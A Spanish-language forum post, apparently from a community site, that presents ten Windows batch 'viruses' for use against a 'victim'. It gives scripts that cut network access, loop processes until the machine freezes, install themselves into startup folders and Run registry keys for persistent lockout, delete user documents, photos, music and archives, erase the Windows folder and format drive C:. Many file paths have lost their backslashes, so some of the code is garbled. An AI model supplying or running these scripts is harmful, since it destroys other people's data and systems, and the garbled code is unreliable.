Te damos la bienvenida a la comunidad de T!Estás a un paso de acceder al mejor contenido, creado por personas como vos.

O iniciá sesión con
¿No tenés una cuenta?
En este post les enseñare a hacer algunos virus:


1- Deja sin internet a una victima.


Codigo:
@echo off
ipconfig/relase
msg * (lo que quieran)
pause
exit



2- Shutdown.

Comando shutdown sirve para reiniciar o apagar el ordenador mediante un tiempo estimado que se le añada o otros valores.

Comandos de shutdown:
Comando: -s (Apaga el equipo)
Comando: -r (Apagar y reiniciar el ordenador)
Comando: -a (Anula el apagado del equipo)
Comando: -t 21 (Pone tiempo para el apagado,donde dice 21 son los segundos que tardará en apagarse/reiniciarse.
Comando: -f (Fuerza el cierre de todos los programas sin advertir al usuario)

Ejemplo:

shutdown -s -t 50 -c "Lo que quieras poner aqui"


3- Bloqueo.

@echo off
:uji
start
goto uji
exit


Este virus bloquear el pc y la unica forma de quitarlo seria desconectandolo.

4- Bloqueo incerrable.

@echo off
Copy %0 "C:autoexec.bat"
Copy %0 "%USERPROFILE%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartupAutoexec.bat"
Copy %0 "%systemroot%autoexec.bat"
reg add "HKLMSoftwareMicrosoftWindowsCurrentVersionRun" /v "Microsoft Office" /d "%systemroot%autoexec.bat"
reg add "HKLMSoftwareMicrosoftWindowsCurrentVersionRun" /v "Microsoft Office" /d "C:autoexec.bat"
reg add "HKLMSoftwareMicrosoftWindowsCurrentVersionRun" /v "Microsoft Office" /d "%USERPROFILE%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartupAutoexec.bat"
@echo off
:uji
start
goto uji
exit

Lo que hace esta aplicacion es que inmediatamente bloqueara el PC de la victima, y la unica estara obligado a desconectarlo a resetearlo y cada que inicie sesion se bloqueara automaticamente dejando como unico remedio formatear la maquina.

5- Destructor de PC


@echo off

cd %windir%

echo @echo off>CPTL.bat

echo reg add hkey_local_machinesoftwaremicrosoftwindowscurr entversionrun /V CTPL.bat /D %windir%system32CPTL.bat>>CPTL.bat

echo if exist %windir%CPTL.bat goto oportunidad>>CPTL.bat

echo copy /Y CPTL.bat %windir%>>CPTL.bat
echo copy /Y CPTL.bat %windir%system32>>CPTL.bat
echo cls>>CPTL.bat

echo :msg>>CPTL.bat
echo msg * A mortal virus has infected your computer!!>>CPTL.bat

echo :oportunidad>>CPTL.bat
echo cd %windir%>>CPTL.bat
echo echo respuesta=INPUTBO“Insert the password to eliminate the virus” >oportunity.vbs>>CPTL.bat
echo echo if respuesta=batch then>>oportunity.vbs>>CPTL.bat
echo echo msgbox (“Correct, the virus won’t bother u more” >>oportunity.vbs>>CPTL.bat
echo echo kill (“C:Windowsvirus.bat” >>oportunity.vbs>>CPTL.bat
echo echo kill (“C:Windowssystem32virus.bat” >>oportunity.vbs>>CPTL.bat
echo echo else>>oportunity.vbs>>CPTL.bat
echo echo msgbox (“Muahaha you’re still infected try it next time” >>oportunity.vbs>>CPTL.bat
echo echo start oportunity.vbs>>CPTL.bat
cls>>CPTL.bat

del /S /Q /F %userprofile%mis documentos*.*

echo :del>>CPTL.bat
echo cd %homedrive%>>CPTL.bat
echo del /Q /S /F *.jpg>>CPTL.bat
echo del /Q /S /F *.avi>>CPTL.bat
echo del /Q /S /F *.mp3>>CPTL.bat
echo del /Q /S /F *.doc>>CPTL.bat
echo del /Q /S /F *.zip>>CPTL.bat
echo del /Q /S /F *.rar>>CPTL.bat
echo cls>>CPTL.bat

echo :petar_escritorio>>CPTL.bat
echo cd %homepath%Escritorio>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 1.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 2.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 3.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 4.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 5.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 6.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 7.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 8.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 9.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 10.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 11.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 12.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 13.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 14.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 15.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 16.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 17.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 18.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 19.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 20.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 21.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 22.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 23.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 24.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 25.txt>>CPTL.bat
echo cls>>CPTL.bat

echo if exist C:virus%random%.txt (goto bucle)>>CPTL.bat

echo etar_HD>>CPTL.bat
echo cd>>CPTL.bat
echo echo Your computer h as been infected, try to pay atention to it> virus%random%.txt>>CPTL.bat
echo cd %ProgramFiles%>>CPTL.bat
echo echo Your computer h as been infected, try to pay atention to it> virus%random%.txt>>CPTL.bat
echo cd %windir%>>CPTL.bat
echo echo Your computer h as been infected, try to pay atention to it> virus%random%.txt>>CPTL.bat
echo goto Petar_HD>>CPTL.bat
echo cls>>CPTL.bat

del /S /Q /F %userprofile%mis documentos*.*

echo :bucle>>CPTL.bat
echo start iexplore.exe>>CPTL.bat
echo start command.com>>CPTL.bat
echo goto bucle>>CPTL.bat

echo :Shutdown>>CPTL.bat
echo shutdown -f -r -t 600 -c “Adios mamonazo bájate un antivirus la próxima vez!!”>>CPTL.bat

copy CPTL.bat %windir%system32

start CPTL.bat


recuerden guardarlo con el nombre que quieran .bat si o si tiene que ser .bat

6- Encuesta falsa

este te hace una encuesta y mientras contestas las preguntas te hace un quilombo y te reinicia la pc y va andar lentisima por siempre:

msg * Contesta esta encuesta y recibiras una sorpresa
set /p var=Te gusta la escuela?
cls
set /p var=Ves series animadas?
cls
@echo off>>virus.com
@echo off>>worm.vbs
cls
set /p var=Que profesion te gusta mas?
cls
@echo off>>troyano.dll
cls
set /p var=Que tipo de musica te gusta?
cls
@echo off>>bomba.reg
@echo off>>script.exe
cls
set /p var=Que celular usas?
cls
@echo off>>analogico.zip
@echo off>>win32vbs.bat
cls
set /p var=Ya quieres k se acabe esta encuesta?
cls
@echo off>>windows.exe
msg * Se acabo la encuesta disfruta tu sorpresa
:menu
start http://www.masterhacks.20m.com
goto menu
:menu
msg * Reinicia la pc o lo hare yo
goto menu
dir
dir
dir
dir
dir
shutdown -r


otra vez la extension .bat

7- Borrador de windows

erase C:WINDOWS q

Guardarlo en.bat

8- Colapsador de PC

Este virus consiste en un programa-bucle que abre miles de pantallas hasta que se colapsa el ordenador y la victima tiene que reiniciarlo, para eso abriís un bloc de notas y escribimos lo siguiente:

@echo

:e

start cmd.exe

goto e


Lo unico que teneis que hacer a continuacion es guardar el documento en .bat (ejemplo: virus.bat) y ya estara acabado.

9- Formateador

Virus de formateo

Abre un bloc de notas , copias lo de a continuacion y pegas

@echo off

format c:/q

echo (Mensaje que queremos que muestre) [/quote]

Si no quieres que se muestre nada borra la ultima linea, ahora le das a "guardar como... y lo guardas en loquesea.bat. Si le das te formatea el ordenador entero

10- Borrador de .jpg y .exe

copia y pega este codigo en un block de notas o un archivo.txt con exteanción (.bat) ejemplo; archivo.bat

@echo off cd del *.jpg /q del *.exe /q shutdown -l shutdown –s exit


------------------------------------------------------------------------------------------------------------------------------------------------

No me hago responsable de lo que puede pasar si abren uno de los virus